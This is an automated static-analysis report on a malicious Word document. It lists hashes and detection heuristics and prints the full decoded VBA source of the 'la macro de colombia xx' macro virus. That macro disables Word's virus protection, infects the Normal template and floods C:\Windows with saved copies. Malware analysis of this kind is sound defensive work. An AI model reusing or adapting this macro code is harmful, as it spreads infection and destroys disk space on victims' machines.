Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 352c4fc689a2bdcd…

MALICIOUS

Office (OLE)

29.5 KB Created: 2000-01-13 16:46:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b43a055004c4ff6635b75f821152d1b0 SHA-1: 780e9908745141735c666a76b7f1c094fe95a946 SHA-256: 352c4fc689a2bdcd7fd66ebfe3a06e9530b2ab4f96d6c29a0901c2164bde0941
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The macro code attempts to infect the Normal.dot template by copying its own code into it, using the string 'la macro de colombia xx' as a marker. This suggests an attempt to achieve persistence or spread the malicious macro to other documents. The presence of legacy WordBasic auto-exec markers and ClamAV detections further support its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Marker-27 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Marker-27
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9745 bytes
SHA-256: 88620f6010869a08ec10413d58301eff6e3504eb1fbbd19d76f4d7e938cd389a
Detection
ClamAV: Doc.Trojan.Marker-27
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1HNormal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
  
  On Error GoTo Finm
  If ActiveDocument.SaveFormat = wdFormatDocument Or ActiveDocument.SaveFormat = wdFormatTemplate Then
      Const exi = "la macro de colombia xx"
      Dim DInfec, planinfec As Boolean
      Dim Docu, Plan As Object
      Dim modulin, contemodu, Ninfec As String
      Dim Nume As Integer
      Dim Copform As Object
  
   
      Set Docu = ActiveDocument.VBProject.VBComponents.Item(1)
      Set Plan = NormalTemplate.VBProject.VBComponents.Item(1)
      
      SaveDoc = ActiveDocument.Saved
      Saveplan = NormalTemplate.Saved
   
      DInfec = Docu.CodeModule.Find(exi, 1, 1, 40000, 40000)
      Plainfec = Plan.CodeModule.Find(exi, 1, 1, 40000, 40000)

      'Ninfec = "'" & " "
      
      Options.VirusProtection = False
   
      Nume = Mid(Int(Rnd() * 10), 1, 1)
      Nume = Nume
      nume1 = 7
      Nume2 = 3
      If Nume = nume1 Or Nume = Nume2 Or Plainfec = False Then
         If DInfec = True And Plainfec = False Then
            On Error Resume Next
            For il = 1 To Plan.CodeModule.CountOfLines
                Plan.CodeModule.DeleteLines 1
            Next
            On Error GoTo Finm
            'Docu.CodeModule.addfromstring Ninfec
            contemodu = Docu.CodeModule.Lines(1, Docu.CodeModule.CountOfLines)
            Plan.CodeModule.addfromstring contemodu
         End If

         If DInfec = False And Plainfec = True Then
            On Error Resume Next
            For il = 1 To Docu.CodeModule.CountOfLines
                Docu.CodeModule.DeleteLines 1
            Next
            On Error GoTo Finm
           'Plan.CodeModule.addfromstring Ninfec
            contemodu = Plan.CodeModule.Lines(1, Plan.CodeModule.CountOfLines)
            Docu.CodeModule.addfromstring contemodu
         End If
         
         If SaveDoc = True Then ThisDocument.Save
         If SaveDoc = True And Plainfec = False Then NormalTemplate.Save
      End If
  End If
    sd = Day(Now()) & "-" & Month(Now()) & "-" & Year(Now())
  sd = Trim(sd)
  If Year(Now()) >= 2000 And Month(Now()) > 6 Then
    ChangeFileOpenDirectory "C:\Windows\"
    For i = 1 To 999999991
        ActiveDocument.SaveAs FileName:=("AA" & i & "AA.DOC"), FileFormat:= _
        wdFormatDocument, LockComments:=False, Password:="", AddToRecentFiles:= _
        True, WritePassword:="", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:= _
        False, SaveNativePictureFormat:=False, SaveFormsData:=False, _
        SaveAsAOCELetter:=False
    Next
  End If
  GoTo Finb
  
Finm:
  On Error Resume Next
  For il = 1 To Docu.CodeModule.CountOfLines
    Docu.CodeModule.DeleteLines 1
  Next
  GoTo Finb
Finb:
 On Error Resume Next
End Sub




















' Processing file: /opt/analyzer/scan_staging/8ada112925dd4672b6739f7749fc41c3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 4965 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_close())
' Line #1:
' Line #2:
' 	OnError Finm 
' Line #3:
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatDocument 
' 	Eq 
' 	Ld ActiveDocument 
' 	MemLd SaveFormat 
' 	Ld wdFormatTemplate 
' 	Eq 
' 	Or 
' 	IfBlock 
' Line #4:
' 	Dim (Const) 
' 	LitStr 0x0017 "la macro de colombia xx"
' 	VarDefn exi
' Line #5:
' 	Dim 
' 	VarDefn DInfec
' 	VarDefn planinfec (As Boolean)
' Line #6:
' 	Dim 
' 	VarDefn Docu
' 	VarDefn Plan (As Object)
' Line #7:
' 	Dim 
' 	VarDefn modulin
' 	VarDefn contemodu
' 	VarDefn Ninfec (As String)
' Line #8:
' 	Dim 
' 	VarDefn Nume (As Integer)
' Line #9:
' 	Dim 
' 	VarDefn Copform (As Object)
' Line #10:
' Line #11:
' Line #12:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.